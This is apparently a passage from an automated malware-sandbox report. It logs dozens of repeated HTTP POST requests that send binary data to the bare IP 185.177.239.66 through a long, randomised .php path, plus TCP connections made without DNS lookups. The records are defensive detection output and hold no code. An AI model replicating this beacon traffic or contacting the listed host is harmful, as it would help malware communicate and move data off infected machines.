                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2192Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2192Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2192Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2164Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2192Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2584Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2192Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2192Expect: 100-continue
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
